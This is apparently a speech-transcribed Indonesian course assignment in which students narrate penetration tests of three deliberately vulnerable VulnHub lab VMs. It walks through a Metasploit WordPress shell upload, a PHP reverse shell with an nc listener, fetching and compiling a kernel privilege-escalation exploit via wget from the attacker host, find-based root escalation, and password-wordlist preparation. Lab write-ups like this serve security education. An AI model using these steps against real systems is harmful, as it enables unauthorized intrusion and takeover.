Perkenalkan, kami dari kelompok T akan melakukan penetration testing untuk tugas keamanan informasi II 3230. Nama saya Fahri Putra Mahardika, NIM 182218080, akan melakukan penetration testing terhadap Vulnhub Hogwarts Dobby. Berikut merupakan page Vulnhub dari VM yang akan dilakukan penetration testing. Pertama, dimulai dengan menjalankan kedua VM, yaitu menggunakan Hogwarts dan Kali Linux. Di sini dapat dilihat bahwa Kali Linux akan digunakan untuk melakukan attack kepada VM Dobby. Login Kali Linux. Pertama, kita buka terminal dari Kali Linux. Lalu kita jalankan IP address checking menggunakan nmap 10.0.2.0/24 untuk mengecek IP address dari semua network yang ada. Di sini terdapat 3 device, yaitu device host, device Dobby, dan device Kali Linux. Dapat lihat bahwa Dobby itu merupakan web server, yaitu ini merupakan menggunakan port TCP, yaitu port 80. Kita lakukan lagi scan nmap, yaitu nmap 10.0.2.5 dengan flag SC dan SV. Dapat terlihat ini terdapat HTTP tuple Draco DG9 dan seterusnya, dan merupakan server Apache. Lalu kita coba hit menggunakan echo dengan kode ini. Kemungkinan besar ini merupakan kode binary yang dalam bentuk base 64, sehingga diubah terlebih dahulu. Kita jadikan base 64. Nah, dapat dilihat bahwa ini merupakan pesan dari HTTP server Dobby. Kemudian kita coba membuka web browser. Kita coba mengunjungi IP address dari Dobby tadi, yaitu 10.0.2.5. Nah, ini merupakan
dapat lihat sebenarnya ini cuma merupakan default page untuk Apache Ubuntu biasa. Namun, jika kita lihat pada page source, pada bagian bawah sekali terdapat c/alohomora. Maka kita coba mengunjungi URL dengan URL yang sama dengan Alohomora. Nah, didapatkan clue bahwa password Draco adalah rumahnya. Nah, di sini ini karena ini VM ini bertema Harry Potter, maka kita dapat mencari passwordnya Draco House. Nah, di sini Draco House yaitu dia adalah murid tahun pertama Harry Potter yang tergabung dalam asrama Slytherin. Kemungkinan besar Slytherin merupakan jawaban dari pertanyaan tersebut. Lalu kita lakukan directory check menggunakan dir http 10.02 mencari semua kemungkinan yang mungkin untuk URL dari 10.0225. Ditemukan terdapat 4 URL yang memungkinkan. Nah, dari sini karena terdapat log, kita akan mencoba melihat log. Nah, di sini diberitakan bahwa passwordnya itu adalah ojppg lrzxnvy2tz dan hintnya yaitu /diagonally. Nah, kita coba karena ini dirasa merupakan base karena merupakan huruf besar, huruf kecil dan angka, kita coba decode dengan base 64. Nah, setelah di decode didapat passwordnya itu yaitu iLexox. Tadi dari log hintnya yaitu adalah /diagonally, maka kita akan coba mengunjungi HTTP IP address yang sama dengan URL diagonally. Didapat bahwa ini merupakan page WordPress. WordPress biasanya memiliki
admin page. Maka kita coba untuk mengunjungi admin page dari WordPress, kita tambahkan URL wp admin. Tadi karena Draco dan rumahnya sudah kita ketahui passwordnya yaitu Slytherin, kita coba login menggunakan Draco dan Slytherin. Di sini berhasil login ke admin WordPress. Kita coba masuk ke dashboard admin WordPress. Nah, di sini kita coba ubah ke bahasa Inggris. Ini merupakan page dashboard yang sudah diubah ke dalam bahasa Inggris. Nah, di sini usernya merupakan Draco. Dan kita kembali logout. Karena kita sudah mendapatkan user yang bernama Draco, kita akan coba mengeksploit menggunakan Metasploit. Kita akan coba membuka konsol MSF konsol. Nah, di sini karena tadi melalui WordPress, kita menggunakan use wp admin. Terdapat beberapa kemungkinan exploit untuk menggunakan WordPress. Di sini kita show option. Kita akan use exploit Unix yang web app wp admin menggunakan shell upload. Sepertinya tadi ada typo, kita use wp_admin karena terdapat vulnerability pada wp admin. Kita lihat apa saja yang dibutuhkan oleh Metasploit. Nah, di sini dia membutuhkan password, airhost, airport, di sini sudah ada yaitu 80, target URL, dan username. Tadi password dari WordPress admin yaitu Slytherin.
Lalu R host-nya atau targetnya yaitu adalah 10.025. Dan target URL-nya adalah diagonally. Username-nya adalah Draco. Lalu kita coba jalankan exploit. Nah, di sini setelah menunggu, exploit berhasil, lalu berhasil membuka Meterpreter session. Kita coba open shell user. Nah, di sini kita sudah masuk ke shell-nya. Kita coba menggunakan Python. Sepertinya ada typo. Import Python Nah, tidak dapat mengakses karena tapi kita sudah masuk ke dalam shell data at Hogwarts. Kita coba export screen supaya muncul kata-kata supaya muncul perintah yang kita masukkan. Nah, di sini kita coba ls untuk melihat direktori apa saja yang ada. Tidak ada, kita coba cd ke home, juga tidak ada file atau directory. Kita coba dari home, melihat bahwa kita sudah berada di home. Nah, di sini pada home terdapat ls dan Dobby. Kita coba masuk ke Dobby. Setelah masuk ke Dobby, kita lihat apa saja direktori yang ada. Nah, di sini terdapat flag pertama. Coba kita lihat isi dari flag pertama. Sekarang karena Dobby merupakan user, kita coba switch user Dobby. Dan password dari Dobby yaitu password yang didapat dari log tadi. Atau ini, yang tadi didekode menjadi I like socks.
Kita coba melihat ID dari user yang ada. Di sini terdapat Adobe, ADM, CD-ROM. Nah, di sini direktori apa saja yang ada. Kita clear terlebih dahulu. Kita coba pergi ke direktori cd/etc. Nah, di sini terdapat banyak sekali direktori, tapi kita coba cari yang bisa bermanfaat untuk kita. Sekarang akan dilakukan vertical privilege escalation. Melakukan privilege escalation melalui find min execute bin sh min p quit. Nah, di sini kita sudah seharusnya kita sudah memasuki root. Kita coba pindah ke root. Di sini terdapat proof. Kita coba jalankan proof. Isi dari proof yaitu Harry Potter and Sorcerer's Stone. Yaitu exploit berhasil dilakukan. Karena kita sudah memasuki root, berakhirlah penetration testing dari vulnerability Hogwarts Dobby ini. Terima kasih. Sampai jumpa lagi. Oke, selanjutnya penetration testing akan dilakukan oleh saya, Helmi Baskara Leganto dengan NIM 182211072. Di sini saya akan melakukan penetration testing terhadap mesin yang bernama Setna yang dapat diakses dan download melalui Phonehub. Oke, kemudian setelah kita download VM dari Setna tersebut, kita juga download dan menggunakan Kali Linux sebagai attack machine. Jadi kita melakukan attack dan penetration terhadap virtual machine Setna itu dari Kali Linux itu sendiri. Kemudian setelah di-download dan sudah di-setup di dalam VirtualBox, jangan lupa juga di-setup dari networknya menggunakan NAT network supaya mereka bisa berada di dalam satu jaringan yang sama. Oke, ya setelah sudah di-setup networknya dan machine-nya langsung bisa dibuka Kali Linux serta virtual machine-nya. Dan di sini saya sudah kebetulan sudah nge-run keduanya.
Pertama kita lihat dulu dari virtual machine Setna ini. Jadi dari virtual machine Setna ini kita bisa lihat bahwa kurang lebih tampilannya seperti ini. Ya, menampilkan tadi IP address dari virtual machine ini. Kemudian sebenarnya ada deskripsi terkait mesin ini, tapi sudah tertutup oleh IP address yang entah kenapa selalu muncul-muncul lagi. Jadi di virtual machine ini ada 4 flag. Flag yang pertama itu untuk root access, yang kedua itu untuk shell, yang dua terakhir itu post exploitation on Setna. Jadi yang akan saya fokuskan di sini itu adalah 2 flag pertama, yaitu shell dan root access. Karena untuk post exploitation itu sendiri memerlukan waktu dan teknik yang lebih tinggi dan lebih lama. Jadi eh, ya kurang lebih hanya 2 itu dulu. Oke, kan tadi VM-nya sudah dijalankan dan sekarang Kali Linux-nya sudah dibuka. Yang pertama kali dilakukan adalah biasanya itu melakukan enumeration dengan mencari IP address dari target. Kita bisa melakukan dengan NetDiscover. Sebenarnya dari virtual machine itu sendiri sebelumnya udah dikasih tahu bahwa IP address-nya itu di 192.168.0.113, tapi di sini kita ngecek aja di NetDiscover-nya ada di IP berapa gitu. Dan ternyata ada di 192.168.0.113 dan ini sudah benar. Sekarang mari kita coba masuk ke sudo supaya mempermudah langkah-langkah selanjutnya. Jika sudah, kita sekarang coba untuk buka IP address tersebut di website browser kita. Di sini saya menggunakan firewall Firefox yang sudah tersedia di Kali Linux. Dan ini merupakan tampilan yang pertama kali terlihat, yaitu Welcome to Setna. Di sini kita mencoba melakukan enumerasi, misalkan kita lihat dulu dari bagaimana page source dari web ini. Dan sepertinya belum bisa memberikan informasi yang menarik untuk penetration. Kemudian di sini ada click here to know what you need to do. Di Hack the Planet, coba kita lihat page source-nya, tapi ya sepertinya tidak bisa dilihat. Kita coba di sini. Ya, nggak bisa dilihat, tapi ya belum menunjukkan sesuatu yang menarik juga di sini. Oke, sekarang setelah itu coba kita melakukan Nmap scanning untuk mengeksplorasi jaringan dan memetakan host dan layanan aktif di jaringan ini. Kita dengan cara Nmap strip SS, strip SV, strip SC, strip P strip 192.168.0.113 strip ON nmap underscore full underscore scan. Oke, jadi Nmap scanning itu kan untuk memetakan host dan layanan aktif di jaringan. Nah, ini akan memindai semua port yang ada di 192.168.0.113. Jadi, ya, Nmap perintah untuk melakukan Nmap scanning, strip SS itu untuk scene scan, untuk stealth scan, jadi nggak terdeteksi gitu oleh beberapa sistem scanning dari Nmap ini. Kemudian strip SV itu untuk mengecek layanan versi layanan yang ada di port yang terbuka tersebut. Kemudian strip SC ini adalah untuk menjalankan script untuk deteksi versi, enumerasi layanan, dan pemeriksaan kerentanan. Strip P strip ini untuk memindai semua port yang ada di TCP. Kemudian ya, strip ON dan nmap underscore full underscore scan ini adalah untuk mengecek semua dari nmap scanning secara full. Dan sekarang kita tunggu aja dulu bagaimana hasil dari nmap scanningnya. Dan ya, sepertinya mulai muncul hasilnya. Oke, jadi Nmap scanningnya sepertinya membutuhkan waktu yang lama dan oh sudah selesai. Oke, jadi di sini kita bisa lihat beberapa seperti port 22, TCP itu servisnya SSH, state-nya open, kemudian port 53 itu menggunakan service domain, port 80 menggunakan HTTP, 110 menggunakan POP3, dan seterusnya hingga 57502 menggunakan status, dan ini 8080 menggunakan HTTP Apache Tomcat. Masih belum ada yang terlihat menarik sepertinya dari sini. Bagaimana coba kalau kita cek dari directory hosts? Siapa tahu ada sesuatu yang menarik ya. Cat slash etc slash hosts.
localhost sekali. Oh, sepertinya belum ada yang menarik. Coba cara lain, misalkan dengan, oh ya, curl, curl. Kita ngecek request dari, misalkan kita nge-request ke HTTP dari IP address-nya, apakah ada sesuatu yang bisa kita dapatkan? Tidak ada yang bisa kita dapatkan. Bagaimana kalau kita pakai Nikto? Nikto strip H, HTTP. Jadi Nikto ini digunakan untuk scanning keamanan server yang dapat mendeteksi kerentanan, konfigurasi tidak aman, file atau direktori yang berpotensi berbahaya. Dan strip H ini merupakan host yang akan di-scan-nya itu 192.168.113. Oke, dan kita bisa lihat terdapat beberapa root files yang sepertinya ditemukan kerentanan dan bisa kita coba untuk diakses langsung dari IP address-nya ya. Kita coba, misalkan dari robots.txt ya, 192.168.031 robots.txt. Nggak bisa kita lihat sesuatu, tapi ini apa nih, hackers nih, boleh kita coba deh, hackers. Oh, tidak ada apa-apa. Kemudian kita coba selanjutnya ada files, ya, files bisa kita coba dari files. Oh, kita bisa menemukan directory dari ya dari machine yang sedang kita penetrate ini. Sebagai catatan, saya sudah beberapa kali mencoba melakukan pengiriman reverse shell sebelumnya sebelum saya mengetik video ini. Jadi beberapa file dari yang tulisannya reverse dan diakhiri .php ini sebenarnya awalnya tidak ada. Jadi ya, tidak ada. Coba kita cek beberapa directory lainnya dan ya sepertinya tidak ada yang menarik ya dari sini. Cuma dari files ini nanti kita bisa exploit gitu. Karena filesnya terbuka, coba kita exploit nanti dengan reverse shell ini nih. Apakah kita bisa mendapatkan sesuatu atau lainnya. Oke, next. Sepertinya tapi kita belum bisa mengapa-ngapain sama files ini karena ya stuck gitu. Kita nggak tahu kita bisa ngelakuin apa dari files ini. Kita coba menggali hal lain gitu dari misalkan dari license.txt ya, kita coba. Hmm, oh, seperti tidak perlu pakai slash. Nah, oke, dari sini kita bisa lihat bahwa ini pakainya Builder Engine ya. Si software itu di develop dengan Builder Engine dan kita bisa cari di Google kalau misalkan Builder Engine itu apakah ada exploited dan enggak, dan saya sudah mencoba melihatnya dan mencarinya dan ditemukan. Kita bisa search aja Builder Engine exploit, nanti di page pertama ada Builder Engine 350 arbitrary file upload. Jadi ini fungsinya itu untuk nge-exploit software yang menggunakan Builder Engine sebagai pengembangannya. Dan dengan exploit ini kita bisa mengirim file-file untuk dikirimkan ke mesin target kita atau web servernya. Misalkan di sini kita mau secara konsep mau mengeksploit dari file directory tadi supaya kita bisa mengirimkan file shell di mana kita bisa nge-reverse gitu si web servernya. Jadi ini kurang lebih ya bisa di copy paste aja. Kemudian saya udah menyiapkan filenya. Jadi ada di pouch.html ini. Jangan lupa untuk pouch.html-nya. Ini kan awalnya masih localhost, tapi disesuaikan dengan IP address dari target mesin kita. Jadi nanti akan dikirimkan ke directory dari server ini gitu. Oke. Kemudian file yang kita kirim seperti yang tadi saya sudah mention, kita akan mengirimkan sebuah reverse shell. Jadi kita nanti bisa nge-exploit dari reverse shell tersebut untuk melakukan ya escalating privilege gitu. Jadi sekarang kita ada di tahap gaining access. Oke, jadi untuk gaining access-nya itu bisa menggunakan yang namanya PHP reverse shell yang tersedia di GitHub ini. Terus bisa kita download atau misalkan copy paste dari file ini untuk dipindah ke Kali Linux, dan saya sudah mencoba melakukan copy paste. Nah, dan secara default sebenarnya IP address yang ini adalah 192 memiliki nilai IP yang berbeda.
yaitu 127 sekian-sekian, dan kita harus menyesuaikan dengan IP address dari host machine yang sedang kita coba untuk ngetek gitu. Jadi host machine dari Kali Linux ini sendiri. Dan bagaimana cara mencarinya? Kita bisa menggunakan ifconfig untuk mengetahui interface ada apa aja. Dan di sini kita bisa lihat di RTH0 bahwa network interface dari Kali Linux ini ada di 192.168.0.6. Jadi kita bisa ganti ke 192.168.0.6. Untuk portnya sendiri dibebaskan di ya nanti akan kita listen ke port yang akan kita tulis gitu ya 1234 di sini. Oke. Jadi setelah itu sudah 1234 dan sudah disesuaikan, reverse shell ini akan dikirimkan ke eh, se- target mesin kita menggunakan pouch.html ini. Namun sebelumnya saya sudah melakukannya. Jadi reverse strip 06 ini kita masukkan dan bisa langsung desain aja. Tapi karena saya sudah berhasil mengirimkannya, jadi eh, ya tidak perlu saya lakukan lagi langkah tersebut dan bisa dicoba oleh penonton. Oke, jadi ini tuh terlihat dari directory files di sini, jadi di reverse strip 06.php. Nah, setelah itu sebelum kita run file ini, kita setup dulu listener buat buat running dari file reverse shell tersebut. Kita karena tadi menggunakan port 1234, kita menggunakan sudo nc strip nlvp 1234, masukkan passwordnya, dan setelah itu kita coba untuk menjalankan filenya, 6.php. Oke, nah kita akhirnya mendapatkan akses melalui port 1234 yang terbuka ini. Setelah kita mendapatkan akses, saatnya kita gaining privilege. Jadi flag yang pertama akan saya kejar itu adalah terkait root access. Jadi kita di sini mau coba mendapatkan root access, dan caranya itu dengan kita enumerasi terlebih dahulu. Ada apa saja di dalam sini, di dalam ya akses yang sudah kita dapatkan. Terus oke, dia menggunakan apa sih gitu OS-nya si web server ini. Dan ternyata dia pakai Ubuntu 14.41 LTS. Oke, sekarang kita coba berarti cari exploit untuk Ubuntu 14.41 LTS. Dan saya sudah mendapatkan ya exploitnya itu dengan ini. Jadi bisa dicoba aja, nanti linknya langsung dicoba gitu. Dan file dicoba di download atau mau di copy juga boleh. Nanti saya belum menyiapkan file, jadi sekalian kita coba bikin. Misalkan kita namakan 37088C. Create. Oke, copy paste dari tadi. Kita save dan tinggal dijalankan nantinya. Oke, jadi kita sekarang waktunya untuk nge-exploit dari akses yang sudah kita dapatkan. Nah, kita pakai terminal lama yang coba kita ke Setna ya. CD Setna. Terus kita jalankan web server di sini. Oke, jadi tadi HTTP server sudah berhasil dijalankan. Kemudian kita mencoba melakukan ya kita mencoba memakai file dari 37088.c yang udah ada di server Setna ini dari port yang sedang kita listen dari 123 sudo nc 1234 ini dengan mengetik wget http titik dua slash slash host IP kita port 8000 dengan 37088.c. Nah, sekarang kita sudah bisa melakukan exploit dengan gcc strip o exploit 37088.c. Terus habis itu chmod plus x exploit. Terus sekarang kita tinggal exploit. Oke, exploit sedang berjalan. Oke, jadi kita sudah berhasil gain access, sudah, ya, kita sudah mendapatkan privilege sebagai host di sini, dan kita bisa tinggal capture rootnya aja, capture flagnya maksud saya di root folder itu cat flag.txt.
Dan ini adalah flag pertama yang berhasil didapatkan. Kemudian flag yang kedua itu adalah dari Shellac. Oke, jadi tadi saya sudah mencoba untuk mengexploit menggunakan Metasploit, tapi sepertinya tidak berhasil, entah mengapa, padahal sebelumnya sudah berhasil. Jadi tertulis bahwa errornya itu adalah Metapleter Session 1 is not valid and will be closed. And saya sudah mencoba beberapa kali, namun hingga keempat kalinya masih tidak berhasil. Metapleter ya, Metapleter Session 1 is not valid and will be closed, dan seterusnya. Dan juga sempat untuk host IP address-nya sempat berubah, yaitu menjadi, saya buka lagi ya, config menjadi 192.168.0125. Oleh karena itu saya sekarang mencoba dengan cara lain dan saya mengupload ulang terkait reverse PHP-nya. Jadi bisa dicek di bagian files, saya mengupload ulang dan memberi reverse PHP yang baru dengan port dan IP address yang sesuai dengan ETH1 tadi. Dan ya, setelah itu saya setup listenernya sudo nc strip nlvp 5050. Saya ganti portnya menjadi 5050 karena 1234 sudah occupied dengan menggunakan Metasploit tadi. Nah, setelah itu kita run reverse new PHP-nya dan kita buka lagi eh, listenernya, dan di sini kita untuk mendapatkan flag kedua itu terletak di file directory di var www, dan ya, dan file yang kedua berhasil diambil. Oke. Dan kemudian untuk file flag yang ketiga itu ada di bagian etc. Oh, kita harus gain root access lagi seperti di awal dengan menjalankan exploit berupa. Oke, jadi karena tadi sempat berubah terkait ya file dan hostnya, kita jalankan ulang terkait host dan portnya. Jadi kita jalankan ulang exploit itu dengan gcc strip o exploit 37.88.2c, kemudian chmod terus x exploit titik slash exploit. Oke, untuk mendapatkan root access lagi. Oke, sudah berhasil. Sekarang kita masuk ke directory cat etc tomcat 7 users xml. Nah, di sini kita bisa melihat bahwa Tomcat password submit is 4 points. Jadi, sepertinya ini merupakan sebuah flag yang kita bisa mencoba submit password ini di Apache server dari ya target machine kita. Jadi tadi namanya adalah Tomcat dengan password submit this 4 point. Oke, berhasil, dan ya seperti ini flag yang ketiga kita berhasil dapatkan. Kemudian flag yang terakhir itu flag keempat itu terletak di sini. Ada sesuatu yang menarik nih. Di bagian crack me for points, titik 2x, titik 2000, titik 2000, titik 2, dan seterusnya. Jadi flag keempat ini akan didapatkan dengan melakukan crack pada password dari crack me for points. Tapi crack ini tidak berhasil saya lakukan dengan John the Ripper password cracker, dan sumber-sumber di internet pun belum ada yang berhasil memecahkan crack tersebut, sumber-sumber yang terbuka. Jadi ya, kurang lebih itu dari saya. Flag 1, flag 2, 3, dan 4 sudah ditemukan, dan terima kasih. Baik, kemudian akan dilanjutkan oleh saya. Sebelumnya perkenalkan, nama saya Syafisirul Arifin dengan NIM 182211048 dari K02 Sistem dan Teknologi Informasi ITB. Di sini saya ingin menjelaskan tutorial hacking VM Power Grid 101
yang bisa di-download di Fullenhub. Jadi di sini ada linknya, fullenhub.com/entry/powergrid strip 101, dan ini ada persen 2C, itu maksudnya koma 485. Jadi tadi namanya PowerGrid 101 dan dirilis pada tanggal 28 Mei 2020 oleh Thomas Williams, dan di sini ada sedikit deskripsinya. Jadi, cyber criminals have taken over the energy grid across Europe. As a member of the security service, you are tasked with breaking into their server, gaining root access, and preventing them from launching their malware before it's too late. We know from previous intelligence that this group sometimes use weak passwords, so we recommend you to look at this attack vector first. Make sure you configure your tools properly. We don't have time to waste. And unfortunately, the criminals have started a 3-hour clock. Can you get to their server in time before their malware is deployed and they destroy the evidence on their server? Jadi seperti yang tertulis di sini, ada 3 jam batas waktunya. Dan mesin ini didesain untuk bisa diselesaikan dalam 1 kali percobaan. Lebih lanjut lagi, kalau misalkan kita udah mulai mengerjakan dan kita mau mencoba untuk pause timernya, itu nggak akan bisa karena ini shutting down the virtual machine will not pause the timer. Dan karena yang bakal disimpan tuh waktu kapan kita mulai, sedangkan waktu kan terus berjalan. Dan setelah timernya udah selesai mencapai 0, mesin ini bakal shutdown dan kita nggak bisa boot lagi. Jadi please keep a local backup of the CTF prior to starting. Jadi jangan lupa untuk di save OVA-nya, jangan dihapus, karena kita bakal mungkin mencoba beberapa kali. Dan di sini ada link downloadnya, karena saya sudah download, jadi mungkin bisa di skip aja. Terus untuk membuka, ini kan filenya OVA ya, OVA formatnya, kita bakal buka pakai Oracle VM VirtualBox. Di sini ada link downloadnya, virtualbox.org/wiki/download. Kalau misalkan kalian pakai Windows, bisa langsung klik aja di sini, terus bakal ngedownload. Terus juga mesin buat hackingnya, kita bakal pakai Kali Linux. Di sini ada 2 opsi. Oh ya, ini di kali.org/get-kali. Ini ada 2 option. Kalian bisa download yang installer image-nya. Kalau misalkan kalian pakai Windows, berarti nanti si Kali Linux ini bisa istilahnya tuh dual boot. Jadi saat kalian nge-boot laptop atau PC kalian, nanti ada pilihannya. Kalian mau login ke Kali Linux ini atau ke Windows. Terus kalau virtual machine berarti ini, kalau misalkan kita pakai Oracle VM VirtualBox atau lainnya. Terus karena aku pakai Oracle VM VirtualBox, maka aku download yang virtual machine. Terus ini aku pakai yang ini. Setelah semuanya selesai diinstal, langsung aja kita buka VM VirtualBox. Terus di sini mungkin aku mulai dari awal aja. Di sini aku bakal praktekin gimana cara kita import file VM tadi, virtual machine, yang formatnya OVA tadi ke Oracle VM VirtualBox Manager. Jadi di sini kita klik aja ke file, terus import appliance, terus cari aja. Sini ada PowerGrid 101 OVA, next, finish, langsung agree aja. Nah di sini ini ketutupan ya, tapi di sini tuh ada importing appliance, masih 10%, kita skip aja. Oke, udah selesai diimport. Di sini ada tambahan ya, kalau bisa kalian lihat ada PowerGrid sekarang. Terus sebelum mulai kita harus setting dulu networknya. Terus kalau defaultnya itu tuh dia bakal host only adapter, network adapter ya. Padahal kita mau dia tuh connect internet dan connect ke Kali Linux juga. Jadi itu harus pakai yang bridge adapter. Ini juga di Kali Linux sama, kita pakai networknya bridge adapter. Oke, jadi mungkin sedikit penjelasan ya. Jadi kalau misalkan kita setting VM kita jadi network itu bridge adapter, VM itu bakal bisa ke connect ke internet dan saling
terhubung antara VM yang kita jalanin. Misalkan tadi yang Kali Linux sama yang Power Grid. Terus karena kita belum tahu nih IP-nya Power Grid itu berapa, jadi kita bakal jalanin si Kali Linux dulu. Oh mungkin sama Power Grid juga deh. Ini biarin aja, dia bakal boot sendiri. Nah, di sini bisa dilihat untuk yang VM Power Grid, dia langsung minta Power Grid login. Padahal kalau kita cek di website Full Hub-nya, nggak ada sama sekali keyword tentang login atau kredensial atau username, password. Jadi karena kita belum tahu, jadi mungkin kita bakal buka dulu yang kalinya dan kita close lagi yang Power Grid. Jadi kita bakal mencoba untuk connect ke Power Grid tapi tanpa pakai CLI-nya. Dan untuk tahu IP-nya ada dua cara sebenarnya, tapi aku bakal liatin dua-duanya. Oke, kita matiin dulu. Terus kita buka lagi yang kali. Oh ya, tadi untuk kali itu default username sama passwordnya itu kali sama kali ya. Oke, jadi komen pertama yang kita bakal pakai yaitu ARP-Scan. ARP-Scan merupakan tool untuk memindai jaringan lokal dengan menggunakan Address Resolution Protocol atau ARP. Terus untuk berjaga-jaga, kita akan menggunakan sudo yang merupakan singkatan dari super user do yang digunakan untuk menjalankan perintah dengan hak akses super user atau administrator. Jadi langsung aja kita ketik sudo apt-scan dan gak lupa kita tambahin strip localnet, yaitu flag yang digunakan oleh apt-scan untuk memindai semua alamat IP dalam jaringan lokal atau subnet yang terhubung. Di sini bisa kita lihat kalau IP yang terdeteksi di jaringan kita itu ada dua aja. Jadi 192.168.01 sama 192.168.0105. Oke, terus kita buka lagi VM VirtualBox-nya. Terus kita jalanin si Power Grid. Sudah terbuka. Tunggu sampai bootnya selesai. Oke, jadi udah mulai ke halaman yang tadi ya, Power Grid login. Terus kita buka lagi si Kali Linux dan kita jalanin lagi komen yang tadi. Di sini kita bisa ngeliat kalau ada tambahan IP baru, yaitu 192.168.0.144. Oh ya, abaikan yang ini ya, yang locally administered. Soalnya itu biasanya dari service Windows dan ya lain-lainnya lah, yang nggak ada kaitannya sama VM kita. Oke, terus berarti udah ketahuan kalau IP dari VM Power Grid adalah 192.168.0.144. Nah, kemudian ada juga cara yang kedua, yaitu menggunakan netdiscover. Komennya pakai sudo netdiscover. Dia lagi scanning. Jadi di sini udah ada kelihatan kalau IP yang ada di network kita itu ada 192.168.01.0105.0144. Dan di sini kita bisa lihat kalau MAC vendor atau hostname-nya adalah PCI Sistem Teknik GmbH yang merupakan ciri khas dari Full Hub. Kemudian kita coba ping ke IP tersebut 192.168.0144. Dan di sini kita bisa lihat kalau dia berhasil terkirim paketnya dengan TTL atau time to live-nya 64 milisecond. 64 di sini menandakan kalau OS yang digunakan oleh VM Power Grid adalah Linux. Ini berbeda dengan Windows yang TTL-nya bakal keluar 128. Kemudian kita akan menggunakan Nmap untuk memetakan port apa saja yang terbuka pada VM Power Grid. Komennya ada sudo nmap strip pstrip strip open strip s kecil s besar strip minret
5000, strip VVV, strip N, strip P besar, N kecil, 192.168.0.144 atau IP dari VM PowerGrid yang tadi. Dan di sini kita bisa lihat kalau port yang terbuka ada 80, 143, dan 993 dengan koneksi TCP. Mungkin sedikit penjelasan. Jadi Nmap merupakan singkatan dari Network Mapper, yaitu tool untuk pemindaian jaringan yang mirip dengan ARP-scan tadi. Terus ada flag min pmin tadi, itu untuk memindai semua port dari 1 hingga 65535 atau dari minimum hingga maksimum. Terus ada juga strip open, yaitu untuk menampilkan port apa saja yang terbuka. Jadi hanya port yang terbuka yang akan ditampilkan. Terus juga strip min S kecil S besar, yaitu flag yang mengindikasikan pemindaian SYN atau juga dikenal sebagai half open scanning. Terus ada juga strip min red 5000, yaitu flag untuk mengirim setidaknya 5000 paket per detik. Terus strip N, yaitu flag untuk tidak melakukan resolusi DNS, dan strip P besar N kecil, yaitu flag untuk melewati pemindaian ping. Terus juga tadi yang terakhir adalah IP dari targetnya. Setelah itu, karena tadi port yang terbuka itu ada 80, yaitu HTTP, maka kita coba saja connect ke IP tersebut. 192.168.0.144. Jadi di sini seperti yang terlihat ada timer selama 3 jam atau 180 menit, dan di sini ada sedikit kata-kata dari yang buat VM-nya. Jadi we have hacked every power grid across Europe. We demand a ransom of 25 billion euro in Bitcoin or the continent will plummet into darkness. This is not a drill, and as you are aware, we have already trialed our methods. Our Bitcoin address has been sent to your leaders. You have 3 hours before we turn your power off and destroy our server of any evidence. TikTok, TikTok, TikTok. Dan ada pembuatnya, yaitu this one, P48, dan Paul 2 dari Simru 1 Hacking Team. Mungkin kita bisa ngelihat kalau di sini ada 3 user atau 3 username, nickname yang mungkin bakal berguna untuk kita login nanti. Karena tadi kan si PowerGrid ini kita belum tahu ya kredensial untuk loginnya apa. Kemudian dari port yang terbuka tadi kita bisa melakukan Nmap lagi, tapi kali ini berbeda, yaitu kita pengen tahu lebih detail mengenai port-port yang terbuka tadi. Ada 80, 143, dan 993. Terus IP-nya 192.168.0.144. Kita tunggu aja. Oke, sudah selesai. Dari sini kita bisa mengetahui kalau OS Linux yang digunakan menggunakan distro Debian, dan jika kita mencari versi Apache-nya, Apache HTTPD 2438 di Launchpad, di sini kita bisa menemukan kalau versi Debian yang digunakan itu Buster. Ini codename-nya untuk versi Debian 10 yang dirilis pada 6 Juli 2019. Selanjutnya kita akan melakukan enumeration menggunakan Nmap lagi untuk menentukan path atau direktori apa saja yang tersedia pada IP tadi. Kita akan menggunakan Nmap. Kali ini flagnya ada script dengan value HTTP strip enum, dan portnya 80 aja karena kita mau pakai yang HTTP-nya. Terus ada 192.168.0.144. Cuman ada satu path, yaitu /images. Kita bisa langsung melihat di sini /images. Jadi ada 2 gambar, yaitu cuman gambar background aja. Jadi ini nggak terlalu berguna. Jadi kita bakal skip aja. Jadi di sini aku mungkin bakal jelasin flagnya aja.
Jadi tadi kan kita pakai flag script. Itu merupakan flag untuk menjalankan script Nmap Scripting Engine atau NSE yang spesifik. Dan ada HTTP enum, yaitu merupakan script untuk melakukan enumerasi direktori dan file yang umum pada web server. Dengan tadi portnya di specify 80. Karena belum menemukan path yang menarik, kita akan mencoba melakukan enumeration lagi menggunakan word list bawaan kali, yaitu big.txt. Di sini kita akan menggunakan komen gobuster dir strip u 192.168.0144 strip w slash bsr share word list dir slash big.txt. Mungkin penjelasan singkat, jadi gobuster itu adalah tool untuk melakukan brute force pada URL, terutama untuk enumerasi direktori atau file di web server. Dan dir itu maksudnya kita akan menggunakan mode untuk melakukan enumerasi direktori, dan ada flag strip u, yaitu flag untuk menentukan URL target, yaitu 192.168.0144, dan ada strip w, yaitu untuk menentukan word list yang akan digunakan untuk brute force directory atau file. Sebenarnya di sini ada banyak ya. Jadi kalau kalian pakai cd aja, usr share word list, terus di tab aja, itu bakal kelihatan kalau di sini tuh ada amas, dirb, dirbuster, parent wifi, legend, metasploit, dan wfuzz. Dan kalau misalkan tadi kita kan pakai dirb, itu bakal ada juga banyak others, stress, nama full. Terus kalau misalkan di dirb aja kita ls, nah itu ada banyak, ada big.txt, katala.txt, common.txt, dan lain-lain. Di sini saya menggunakan big.txt karena word listnya cukup lengkap. Oke, balik lagi. Jadi hasilnya beberapa path lain ditemukan. Jika kita mengabaikan yang berstatus 403 atau forbidden, maka yang tersisa adalah path images sama zmail. Yang kalau kita buka, /zmail, maka web tersebut akan meminta kita untuk login. Nah, dari sini kita sudah menemukan celah untuk autentikasi. Untuk memecahkan ini, kita akan memerlukan rockyou.txt, yaitu merupakan sebuah word list yang berisi sekitar 14 juta password yang telah bocor dari berbagai data breach. rockyou.txt. Mungkin kita bisa cari Google aja untuk penjelasannya. Nih, it's commonly used by a hacker to crack a file or password. Sebenarnya dari Kali Linux sendiri itu udah ada file rockyou.txt. Nah, tapi karena dia tuh masih dalam format gzip atau yang biasa kalian tahu mungkin zip, jadi kita perlu pakai ada tools namanya gunzip untuk dekompresi file tersebut. Nah, di mana sih emang letak si rockyou.txt itu? Jadi lokasinya dia tuh ada di usr share word list. Nah, di sini kita bisa lihat ada rockyou.txt. Oh, ini udah aku unzip ya. Tapi defaultnya itu bakal ada rockyou.txt.gz dan komennya itu pakai sudo gunzip /usr share word list rockyou.txt untuk unzip file rockyou tadi menjadi .txt biasa. Nah, penjelasan singkatnya mungkin tadi 